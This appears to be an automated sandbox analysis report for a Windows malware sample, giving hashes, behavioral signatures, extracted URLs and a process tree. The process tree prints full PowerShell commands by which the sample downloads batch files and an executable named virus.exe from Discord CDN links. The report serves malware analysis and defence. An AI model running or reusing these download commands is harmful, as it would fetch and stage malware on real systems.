Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
26/01/2024, 11:54
Static task
static1
Behavioral task
behavioral1
Sample
d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
Resource
win10v2004-20231215-en
General
-
Target
d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe
-
Size
108KB
-
MD5
5a0002d2a22ceca62c674539b7454ae4
-
SHA1
8aebc5ca26daace2b5cef162500ffe515fc601e1
-
SHA256
f240023089aeb390afb771116dcd81d753e1270a573caef7118be24ad3799762
-
SHA512
083792c1e199deaa86fde46b5b788c50a1b8a3b6bed4493d509aaa5d6c75fad4a631e64e0bc717ec13628d7fc3250d92566a12c934e6c04b1ac5452adbe573a7
-
SSDEEP
1536:K7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIflAmOHk1xJ:oq6+ouCpk2mpcWJ0r+QNTBfl9e
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat
Extracted
https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe
Signatures
-
Blocklisted process makes network request 10 IoCs
flow pid Process 5 2304 powershell.exe 6 2304 powershell.exe 8 2136 powershell.exe 9 2136 powershell.exe 11 2836 powershell.exe 12 2836 powershell.exe 14 2928 powershell.exe 15 2928 powershell.exe 17 1696 powershell.exe 18 1696 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2304 powershell.exe 2712 powershell.exe 2136 powershell.exe 3024 powershell.exe 2836 powershell.exe 2764 powershell.exe 2928 powershell.exe 1936 powershell.exe 1696 powershell.exe 1788 powershell.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2972 2168 d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe 27 PID 2168 wrote to memory of 2972 2168 d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe 27 PID 2168 wrote to memory of 2972 2168 d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe 27 PID 2168 wrote to memory of 2972 2168 d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe 27 PID 2972 wrote to memory of 2304 2972 cmd.exe 29 PID 2972 wrote to memory of 2304 2972 cmd.exe 29 PID 2972 wrote to memory of 2304 2972 cmd.exe 29 PID 2972 wrote to memory of 2712 2972 cmd.exe 30 PID 2972 wrote to memory of 2712 2972 cmd.exe 30 PID 2972 wrote to memory of 2712 2972 cmd.exe 30 PID 2972 wrote to memory of 2136 2972 cmd.exe 31 PID 2972 wrote to memory of 2136 2972 cmd.exe 31 PID 2972 wrote to memory of 2136 2972 cmd.exe 31 PID 2972 wrote to memory of 3024 2972 cmd.exe 32 PID 2972 wrote to memory of 3024 2972 cmd.exe 32 PID 2972 wrote to memory of 3024 2972 cmd.exe 32 PID 2972 wrote to memory of 2836 2972 cmd.exe 33 PID 2972 wrote to memory of 2836 2972 cmd.exe 33 PID 2972 wrote to memory of 2836 2972 cmd.exe 33 PID 2972 wrote to memory of 2764 2972 cmd.exe 34 PID 2972 wrote to memory of 2764 2972 cmd.exe 34 PID 2972 wrote to memory of 2764 2972 cmd.exe 34 PID 2972 wrote to memory of 2928 2972 cmd.exe 35 PID 2972 wrote to memory of 2928 2972 cmd.exe 35 PID 2972 wrote to memory of 2928 2972 cmd.exe 35 PID 2972 wrote to memory of 1936 2972 cmd.exe 36 PID 2972 wrote to memory of 1936 2972 cmd.exe 36 PID 2972 wrote to memory of 1936 2972 cmd.exe 36 PID 2972 wrote to memory of 1696 2972 cmd.exe 37 PID 2972 wrote to memory of 1696 2972 cmd.exe 37 PID 2972 wrote to memory of 1696 2972 cmd.exe 37 PID 2972 wrote to memory of 1788 2972 cmd.exe 40 PID 2972 wrote to memory of 1788 2972 cmd.exe 40 PID 2972 wrote to memory of 1788 2972 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\68E1.tmp\68E2.tmp\68E3.bat C:\Users\Admin\AppData\Local\Temp\d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18KB
MD5da14901fbd42e828503cc0f75847af52
SHA1db49087447161b0fc6ee882dfc6906d1a9d1b96e
SHA2568c2ff4915c53918275152048cf955f70fa23c531c88bd91f1e9b32c818bb9b7f
SHA5128e8196a15a09f0b18e8d4e8d7d1c43c56c67ff2a32e58dc9746ea8d7a75679d38f255a683ea1c0d013d27a630e06f49f6e365a29cccaa327096669ed8d3d9154
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K4ZS9Z1WFX21BOULULSL.temp
Filesize7KB
MD557052386a785e7b798274f09230d5923
SHA1e91aef4bcac9cf3ad51f3fe88c3650e629c6cf1a
SHA2562c20859ce8ef861aa1e4f854619ee9c4602d753255208b01882c17c8ad19c3e9
SHA5129c7d8fee4fa2b5937abb6e9a97dd3eb21cca5a6204eccf877f62f751abe7b3644a435eb28cc9e252a7f76b5e163da1eba1f12995730211cb990a946c45b1b448